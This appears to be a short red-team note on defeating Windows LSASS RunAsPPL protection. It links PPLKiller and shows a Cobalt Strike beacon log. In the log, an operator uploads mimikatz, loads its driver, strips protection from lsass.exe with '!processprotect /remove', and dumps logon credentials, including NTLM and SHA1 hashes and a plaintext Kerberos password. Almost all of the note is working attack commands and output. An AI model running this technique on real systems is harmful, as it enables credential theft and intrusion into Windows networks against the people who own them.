RunAsPPL | Notion

Solution: https://github.com/Mattiwatti/PPLKiller
More information: https://itm4n.github.io/lsass-runasppl/
Example:
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

beacon> upload
[*] Tasked beacon to upload /root/Tools/Mimikatz/x64/mimikatz.exe as mimikatz.exe
[+] host called home, sent: 1046576 bytes
[+] host called home, sent: 262968 bytes
beacon> ls
[*] Tasked beacon to list files in .
[+] host called home, sent: 19 bytes
[*] Listing: c:\\Temp\\

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 0b       fil     04/02/2021 16:51:48   eojwsooepcd.dat
 0b       fil     04/02/2021 16:51:48   g1wmxlycq3q.dat
 36kb     fil     04/09/2021 08:06:49   mimidrv.sys
 1mb      fil     04/09/2021 08:26:00   mimikatz.exe
 4kb      fil     04/02/2021 16:51:36   pwlog.txt
 410kb    fil     04/07/2021 19:01:40   seatbelt_eris.txt

beacon> run C:\\temp\\mimikatz.exe "!+" "!processprotect /remove /process:lsass.exe"
[*] Tasked beacon to run: C:\\temp\\mimikatz.exe "!+" "!processprotect /remove /process:lsass.exe"
[+] host called home, sent: 88 bytes
[+] received output:

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 18 2020 19:18:29
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \\ / ##       > <https://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > <https://pingcastle.com> / <https://mysmartlogon.com> ***/

mimikatz(commandline) # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
ERROR kull_m_service_install ; StartService (0x000000b7)

mimikatz(commandline) # !processprotect /remove /process:lsass.exe
Process : lsass.exe
PID 548 -> 00/00 [0-0-0]

mimikatz # 
beacon> logonpasswords
[*] Tasked beacon to run mimikatz's sekurlsa::logonpasswords command
[+] host called home, sent: 296058 bytes
[+] received output:

Authentication Id : 0 ; 191297442 (00000000:0b66f7a2)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 4/8/2021 3:29:35 PM
SID               : S-1-5-18
	msv :	
	 [00000003] Primary
	 * Username : Dummy
	 * Domain   : CITADEL
	 * NTLM     : 16fc2e3ba9fa40ee38520d98e00e96ef
	 * SHA1     : 306b3b78a6a273ef492995d96600fa5a6f6aa215
	tspkg :	
	wdigest :	
	 * Username : Dummy
	 * Domain   : CITADEL
	 * Password : (null)
	kerberos :	
	 * Username : Dummy
	 * Domain   : CITADEL
	 * Password : asdfASDF1!
	ssp :	
	credman :